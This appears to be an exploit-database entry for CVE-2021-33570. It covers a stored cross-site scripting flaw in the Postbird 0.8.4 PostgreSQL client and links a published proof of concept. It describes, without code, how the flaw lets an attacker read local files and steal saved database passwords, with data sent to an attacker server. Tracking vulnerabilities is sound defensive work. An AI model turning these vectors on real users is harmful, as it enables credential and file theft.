CVE-2021-33570

MEDIUM

Postbird 0.8.4 - Stored Cross-Site Scripting via IMG onerror Attribute

Title source: llm

Exploitation Summary

EIP tracks 1 public exploit for CVE-2021-33570. PoCs published by Debshubra Chakraborty.

AI-analyzed exploit summary This exploit demonstrates a JavaScript injection vulnerability in Postbird 0.8.4, allowing XSS, LFI, and credential theft via crafted payloads. It includes a Python server to exfiltrate data from the victim's machine.

Description

Postbird 0.8.4 allows stored XSS via the onerror attribute of an IMG element in any PostgreSQL database table. This can result in reading local files via vectors involving XMLHttpRequest and open of a file:/// URL, or discovering PostgreSQL passwords via vectors involving Window.localStorage and savedConnections.

Exploits (1)

exploitdb WORKING POC

by Debshubra Chakraborty · pythonwebappsmultiple

https://www.exploit-db.com/exploits/49910

View Code ZIP pw:eip

This exploit demonstrates a JavaScript injection vulnerability in Postbird 0.8.4, allowing XSS, LFI, and credential theft via crafted payloads. It includes a Python server to exfiltrate data from the victim's machine.

Classification

Working Poc 95%

Attack Type

Xss

Complexity

Trivial

Reliability

Reliable

Target: Postbird 0.8.4

No auth needed

Prerequisites: Victim must execute the crafted payload in Postbird

MITRE ATT&CK